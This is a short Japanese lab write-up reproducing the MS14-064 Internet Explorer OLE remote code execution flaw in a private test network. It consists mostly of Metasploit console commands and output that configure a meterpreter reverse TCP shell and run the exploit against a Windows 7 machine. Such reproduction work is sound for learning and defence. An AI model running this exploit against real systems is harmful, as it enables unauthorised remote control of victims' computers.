バックグラウンド
Microsoft Windows OLEリモートコード実行の脆弱性OLE(Object Linking and Embedding)は、アプリケーションがデータと機能を共有できるようにするテクノロジです。リモートの攻撃者はこの脆弱性を利用して、構築されたWebサイトを介して任意のコードを実行し、Win95 + IE3 – Win10 + IE11フルバージョンに影響を与えます。 ..。。
模块:exploit / windows / browser / ms14_064_ole_code_execution
再発
| システム | IP |
|---|---|
| Linux | 10.7.10.43 |
| win7 | 10.7.10.49 |
msf6 > search ms14-064
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/browser/ms14_064_ole_code_execution 2014-11-13 good No MS14-064 Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution
1 exploit/windows/fileformat/ms14_064_packager_python 2014-11-12 excellent No MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python
2 exploit/windows/fileformat/ms14_064_packager_run_as_admin 2014-10-21 excellent No MS14-064 Microsoft Windows OLE Package Manager Code Execution
Interact with a module by name or index. For example info 2, use 2 or use exploit/windows/fileformat/ms14_064_packager_run_as_admin
msf6 > use exploit/windows/browser/ms14_064_ole_code_execution
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/browser/ms14_064_ole_code_execution) > ifconfig
[*] exec: ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.7.10.43 netmask 255.255.255.0 broadcast 10.7.10.255
inet6 fe80::20c:29ff:fe3d:e7e0 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:3d:e7:e0 txqueuelen 1000 (Ethernet)
RX packets 72244 bytes 6467761 (6.1 MiB)
RX errors 0 dropped 34923 overruns 0 frame 0
TX packets 51553 bytes 7628452 (7.2 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 1380 bytes 120208 (117.3 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1380 bytes 120208 (117.3 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
msf6 exploit(windows/browser/ms14_064_ole_code_execution) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(windows/browser/ms14_064_ole_code_execution) > set AllowPowershellPrompt true
AllowPowershellPrompt => true
msf6 exploit(windows/browser/ms14_064_ole_code_execution) > show options
Module options (exploit/windows/browser/ms14_064_ole_code_execution):
Name Current Setting Required Description
---- --------------- -------- -----------
AllowPowershellPrompt true yes Allow exploit to try Powershell
Retries true no Allow the browser to retry the module
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TRYUAC false yes Ask victim to start as Administrator
URIPATH no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.7.10.43 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows XP
msf6 exploit(windows/browser/ms14_064_ole_code_execution) > exploit
URLを取得し、win7でアクセスして、シェルに戻ります
参考記事:
https ://www.cnblogs.com/5301z/p/6714300.html
https://blog.csdn.net/nzjdsds/article/details/81912349